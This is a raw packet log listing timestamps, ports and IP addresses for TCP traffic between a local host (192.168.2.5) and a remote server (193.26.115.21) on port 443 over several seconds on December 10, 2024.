Dec 10, 2024 09:48:07.414397955 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.423644066 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.423665047 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.423727036 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.423734903 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.423765898 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.432404041 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.432420969 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.432483912 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.432491064 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.432534933 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.442300081 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.442316055 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.442393064 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.442403078 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.442512989 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.452522993 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.452547073 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.452578068 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.452586889 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.452639103 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.461637974 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.461653948 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.461703062 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.461709976 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.461752892 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.461760998 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.471694946 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.471716881 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.471764088 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.471771002 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.471873999 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.527946949 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.527968884 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.528018951 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.528037071 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.528072119 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.528093100 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.606545925 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.606570005 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.606626034 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.606642962 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.606657028 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.606724977 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.612999916 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.613014936 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.613087893 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.613099098 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.613140106 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.619369030 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.619385958 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.619467020 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.619472980 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.619545937 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.626596928 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.626612902 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.626671076 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.626677990 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.626699924 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.626724005 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.633537054 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.633558035 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.633600950 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.633606911 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.633649111 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.640351057 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.640435934 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:07.851336002 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:07.851396084 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:08.287336111 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:08.287405014 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:09.123336077 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:09.123393059 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.260571957 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.260602951 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.260616064 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.260664940 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.260672092 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.260705948 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.260710001 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.260721922 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.260726929 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.260730982 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.260746956 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.260751963 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.260792017 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.260797024 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.260828972 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.260848045 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.260879040 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.260883093 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.260890961 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.260951042 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.260956049 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.260962009 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.261033058 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.261100054 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.261107922 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.261168003 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.467336893 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.467400074 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.707051039 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.707077980 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.707142115 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.713010073 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.713015079 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.713022947 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.713175058 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.713179111 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.713195086 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.713269949 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.713283062 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.713293076 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.713306904 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.713349104 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.713360071 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.713371038 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.713397026 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.713402987 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.713413954 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.713454008 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.713458061 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.713515043 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.713567972 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.713572979 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.713619947 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:10.923332930 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:10.924633026 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.086124897 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.086142063 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.086194992 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.094893932 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.094899893 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.094913960 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.094923973 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.094995975 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.095005035 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.095031023 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.095042944 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.095046997 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.095083952 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.095087051 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.095096111 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.095160007 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.095179081 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.095216036 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.095226049 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.095263004 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.095288992 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.299334049 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.299402952 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.328418970 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.328447104 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.328511953 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.337251902 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.337265015 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.337277889 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.337286949 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.337385893 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.337392092 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.337407112 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.337429047 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.337568045 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.337573051 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.337587118 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.337609053 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.337615013 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.337620020 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.337641001 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.337734938 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.547341108 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.547391891 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.602238894 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.602256060 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.602319002 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.630075932 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.630083084 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.630096912 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.630100965 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.630253077 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.630259037 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.630275011 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.630289078 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.630434036 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.630439997 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.630461931 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.630490065 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.630494118 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.630511045 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.630604982 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:11.839334965 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:11.839421034 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.071515083 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.071531057 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.071654081 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.078404903 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.078412056 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.078423023 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.078530073 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.078530073 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.078535080 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.078543901 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.078557014 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.078572989 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.078577995 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.078582048 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.078668118 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.078674078 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.078691006 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.078694105 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.078706026 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.078708887 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.078865051 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.078870058 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.078885078 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.078903913 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.078953981 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.078993082 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.283338070 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.283406973 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.356936932 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.356962919 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.357043982 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.364233017 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.364243984 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.364259958 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.364273071 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.364346981 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.364352942 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.364412069 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.364418030 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.364438057 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.364442110 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.364470959 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.364475965 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.364550114 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.364554882 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.364568949 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.364597082 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.364664078 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.575333118 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.575438976 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.660191059 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.660204887 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.660334110 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.672425985 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.672435999 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.672446012 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.672576904 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.672581911 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.672593117 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.672604084 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.672638893 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.672641993 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.672683001 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.672687054 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.672700882 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.672734022 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.672738075 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.672753096 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.672755957 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.672789097 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.672792912 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.672808886 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.672837019 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.672837019 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.672841072 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.672857046 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.672950029 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.672981024 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.672981024 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.879334927 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.879479885 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.938703060 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.938713074 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.938798904 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.948734999 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.948739052 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.948750973 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.948760986 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.948884964 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.948884964 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.948889971 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.948911905 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.948928118 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.948934078 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.949006081 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.949011087 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.949140072 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.949140072 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:12.949146986 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:12.949357033 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.159331083 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.159435987 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.302877903 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.302887917 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.302947044 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.309148073 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.309151888 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.309165001 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.309176922 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.309250116 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.309252977 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.309289932 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.309295893 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.309320927 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.309324980 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.309384108 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.309500933 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.309500933 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.309506893 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.309519053 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.309592962 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.309708118 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.519336939 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.519462109 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.562078953 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.562098026 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.562156916 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.568341017 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.568346977 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.568360090 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.568376064 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.568439007 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.568439007 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.568447113 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.568465948 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.568478107 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.568506956 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.568511963 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.568526030 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.568558931 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.568564892 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.568579912 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.568624020 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.568628073 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.568677902 CET	49711	443	192.168.2.5	193.26.115.21
Dec 10, 2024 09:48:13.568685055 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.568710089 CET	443	49711	193.26.115.21	192.168.2.5
Dec 10, 2024 09:48:13.568726063 CET	443	49711	193.26.115.21	192.168.2.5
